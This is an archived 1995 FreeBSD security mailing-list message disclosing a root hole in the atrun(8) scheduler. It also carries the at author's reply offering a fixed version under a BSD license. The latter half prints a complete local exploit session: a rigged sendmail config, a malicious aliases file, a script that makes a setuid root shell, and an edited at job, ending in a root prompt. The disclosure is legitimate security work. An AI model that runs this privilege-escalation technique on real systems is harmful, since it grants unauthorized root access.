Date: Tue, 4 Apr 1995 16:20:44 +0300 (GMT+0300) From: adam <adam@math.tau.ac.il> To: freebsd-security@FreeBSD.org Subject: atrun hole Message-ID: <199504041320.QAA09588@lune.math.tau.ac.il>
next in thread | raw e-mail | index | archive | help
There are some security problems in the FreeBSD atrun(8) system, one of which allows root access to be obtained easily. First, before running a job, atrun takes an 8 character string from the at job file, assumes it is the login of someone to mail, and passess it to sendmail without any checks. The code says that atrun is run setuid root, and therefore it tries to remain secure by using a scheme which revokes privileges based on changing the real and effective uids of the process. Note, *uids*. However, since (both according to the man page, and the way FreeBSD comes set up) atrun is not setuid root, but executed from /etc/crontab -- it is really run by the root uid. This means that no matter what atrun does, it executes sendmail as root, and there's the hole, which allows root to be broken. An exploit for this problem is included below. The second problem is that atrun only calls setgid() and setuid() to reduce privileges, and doesn't call initgroups(). This leaves jobs run by atrun being in every group root is in. The author of the program, Thomas Koenig <ig25@rz.uni-karlsruhe.de>, has released a better version of the system, at-2.7a, for Linux. It fixes all of these problems. Therefore, as an immediate fix, I suggest obtaining and installing that version, though I'm unsure of how smoothly it will go, considering it's a Linux program. ftp://sunsite.unc.edu/pub/Linux/system/Daemons/at-2.7a.tgz He writes -- ``If it's ok by the FreeBSD people, I'll put out version 2.8 (which checks for the presence of a '-' in the name to be mailed to, and then doesn't invoke the mailer) up with a BSD copyright again, but that'll take a bit of time.'' And, later -- Subject: Re: atrun hole To: adam@math.tau.ac.il (adam) Date: Tue, 4 Apr 1995 01:20:36 +0200 (MET DST) In-Reply-To: <199503311834.UAA29332@lune.math.tau.ac.il> from "adam" at Mar 31, 95 08:34:34 pm From: Thomas.Koenig@ciw.uni-karlsruhe.de (Thomas Koenig) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 324 An additional thought... If there's any problem because of the GPL copyright on at 2.7a, I, with this mail, give the *BSD maintainers permission to put it under the same BSD-style license which I've slapped on 2.5 or whatever old version it was I sent them. Please feel free to forward this as appropriate. Thomas Koenig === The following works provided the at jobs directory (/var/at/jobs) is accessible to users. It is with FreeBSD. It is set to mode 0700 with at-2.7a. 5:53pm [eden:~] % whoami adam 5:53pm [eden:~] % cd /tmp 5:53pm [eden:/tmp] % sed -e 's/Og1/Og0/' -e 's/Ou1/Ou0/' -e 's/etc\/aliases/tmp\/aliases/' /etc/sendmail.cf > c 5:54pm [eden:/tmp] % cat > aliases postmaster: "|/tmp/rootme" root: "|/tmp/rootme" adam: "|/tmp/rootme" ^D 5:55pm [eden:/tmp] % /usr/sbin/sendmail -bi -oA/tmp/aliases -oQ/tmp /tmp/aliases: 3 aliases, longest 14 bytes, 60 bytes total 5:55pm [eden:/tmp] % cat > rootme #!/bin/sh /bin/cp /bin/sh /tmp/sh /bin/chmod 6777 /tmp/sh ^D 5:55pm [eden:/tmp] % chmod 755 rootme 5:56pm [eden:/tmp] % at now + 1 min fooz ^D Job a00ca9a79.000 will be executed using /bin/sh 5:56pm [eden:/tmp] % joe /var/at/jobs/a00ca9a79.000 5:56pm [eden:/tmp] % cat /var/at/jobs/a00ca9a79.000 #! /bin/sh # mail -C/tmp/c 1 umask 22 HOME=\/home\/adam; export HOME SHELL=\/usr\/local\/bin\/tcsh; export SHELL LOGNAME=adam; export LOGNAME USER=adam; export USER PATH=\/home\/adam\/bin\:\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin\:\/usr\/local\:\/usr\/local\/bin; export PATH HOSTTYPE=FreeBSD; export HOSTTYPE VENDOR=intel; export VENDOR OSTYPE=FreeBSD; export OSTYPE MACHTYPE=i386; export MACHTYPE SHLVL=1; export SHLVL PWD=\/tmp; export PWD HOST=eden; export HOST PAGER=less; export PAGER VISUAL=joe; export VISUAL MANPATH=\/usr\/share\/man\:\/usr\/local\/man\:\/usr\/man\:\/home\/adam\/man; export MANPATH cd /tmp fooz 5:56pm [eden:/tmp] % sleep 240 DING! [eden:/tmp] % /tmp/sh # whoami root
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199504041320.QAA09588>